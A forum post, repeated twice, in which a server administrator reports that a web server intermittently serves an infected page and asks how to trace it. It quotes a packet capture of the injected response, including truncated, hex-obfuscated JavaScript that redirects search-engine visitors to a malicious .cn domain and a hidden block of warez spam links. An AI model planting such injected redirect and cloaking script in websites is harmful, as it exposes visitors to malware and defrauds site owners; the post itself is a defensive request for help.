I
irian
Guest
hello,
we are experiencing a strange behavior with our web pages.
At irregular time intervals, on random web pages, the client instead of getting the normal web page gets a page containing a virus.
Here a wireshark client capture from such a web page:
GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: ro
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322)
Host: ................
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 05 Nov 2009 20:26:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
8f53
<script type="text/javascript" language="javascript"> var atzve=new Date( ); atzve.setTime(atzve.getTime( )+12*60*60*1000); document.cookie="n_sess_id=a719c4e\x30f2\x321\x37a2\x660036d87ebeb145b\x39"+"\x3b p\x61\164\x68=/; ex\x70ires\x3d"+atzve.toGMTString( ); </script>
<script type="text/javascript" language="javascript"> var mdpfi=new Array("\x68tt\x70:/\x2fsneak\x2dpea\x6b.cn/?p\x69d=180s\x308\x26s\x69d=3c5779","htt\x70://\x73\x6ee\x61\x6b-pea\x6b.cn/?pid=180s0\x39&sid=\x33c57\x379"); var ajxkvmr="ca\x2cco,d\x61\054\x64e,cy\x2cel,e\x6e,eo\x2ces,\x66i,\x66r,g\x61,\x69t,\x6aa,\x6ai,\x6bn\x2cn\x6c,n
; return; }function birh( ){return document.referrer.indexOf("\x67o\x6f\x67le.")!=-1 || document.referrer.indexOf("\x79aho\x6f\x2e")!=-1 || document.referrer.indexOf("bi\x6eg.")!=-1; } </script>.........
206b
<script>document.write(String.fromCharCode(60,100,105,118,32,115,116,121,108,101,61,39,100,105,115,112,108,97,121,58,110,111,110,101,39,62))</script><a href="http://keygenguru.com/movies.php">movie downloads</a> <a href="http://keygenguru.com/movies.php">legal movies</a> <a href="http://keygenguru.com/movies.php">movies for ipod</a> <h1><a href="http://keygenguru.com/movies.php">divx online</a> </h1>232.198.198.95 <a href="http://keygenguru.com/software/microsoft-office-2003-professional-with-business-contact-manager-for-outlook.html">Download Microsoft Office 2003</a> <h1><a href="http://keygenguru.com/software/sony-vegas-pro-90.html">Download Sony Vegas Pro 9.0</a> </h1><h1><a href="http://keygenguru.com/software/adobe-........
We have verified all the packages on our system and they seem ok. We installed and run rkhunter to check for rootkits and found none.
We run rkhunter --propupd on a new/clean system and placed the files database it on the problematic machine and all the standard binary files are identical between the two machines
The only suspect file that showed when verifying all the rpms was /usr/sbin/suexec.
It was different than /usr/local/psa/suexec/psa-suexec but not from a rootkit, but because it was modified by prelink.
The problem is hard to debug because it manifests itself randomly.
Do you have any ideea how to trace and solve this kind of problem???
P.S
It is not a dns spoofed page, because the server ip that appears in the wireshark capture taken on the client is the correct one.
thank you
we are experiencing a strange behavior with our web pages.
At irregular time intervals, on random web pages, the client instead of getting the normal web page gets a page containing a virus.
Here a wireshark client capture from such a web page:
GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: ro
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322)
Host: ................
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 05 Nov 2009 20:26:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
8f53
<script type="text/javascript" language="javascript"> var atzve=new Date( ); atzve.setTime(atzve.getTime( )+12*60*60*1000); document.cookie="n_sess_id=a719c4e\x30f2\x321\x37a2\x660036d87ebeb145b\x39"+"\x3b p\x61\164\x68=/; ex\x70ires\x3d"+atzve.toGMTString( ); </script>
<script type="text/javascript" language="javascript"> var mdpfi=new Array("\x68tt\x70:/\x2fsneak\x2dpea\x6b.cn/?p\x69d=180s\x308\x26s\x69d=3c5779","htt\x70://\x73\x6ee\x61\x6b-pea\x6b.cn/?pid=180s0\x39&sid=\x33c57\x379"); var ajxkvmr="ca\x2cco,d\x61\054\x64e,cy\x2cel,e\x6e,eo\x2ces,\x66i,\x66r,g\x61,\x69t,\x6aa,\x6ai,\x6bn\x2cn\x6c,n
; return; }function birh( ){return document.referrer.indexOf("\x67o\x6f\x67le.")!=-1 || document.referrer.indexOf("\x79aho\x6f\x2e")!=-1 || document.referrer.indexOf("bi\x6eg.")!=-1; } </script>.........
206b
<script>document.write(String.fromCharCode(60,100,105,118,32,115,116,121,108,101,61,39,100,105,115,112,108,97,121,58,110,111,110,101,39,62))</script><a href="http://keygenguru.com/movies.php">movie downloads</a> <a href="http://keygenguru.com/movies.php">legal movies</a> <a href="http://keygenguru.com/movies.php">movies for ipod</a> <h1><a href="http://keygenguru.com/movies.php">divx online</a> </h1>232.198.198.95 <a href="http://keygenguru.com/software/microsoft-office-2003-professional-with-business-contact-manager-for-outlook.html">Download Microsoft Office 2003</a> <h1><a href="http://keygenguru.com/software/sony-vegas-pro-90.html">Download Sony Vegas Pro 9.0</a> </h1><h1><a href="http://keygenguru.com/software/adobe-........
We have verified all the packages on our system and they seem ok. We installed and run rkhunter to check for rootkits and found none.
We run rkhunter --propupd on a new/clean system and placed the files database it on the problematic machine and all the standard binary files are identical between the two machines
The only suspect file that showed when verifying all the rpms was /usr/sbin/suexec.
It was different than /usr/local/psa/suexec/psa-suexec but not from a rootkit, but because it was modified by prelink.
The problem is hard to debug because it manifests itself randomly.
Do you have any ideea how to trace and solve this kind of problem???
P.S
It is not a dns spoofed page, because the server ip that appears in the wireshark capture taken on the client is the correct one.
thank you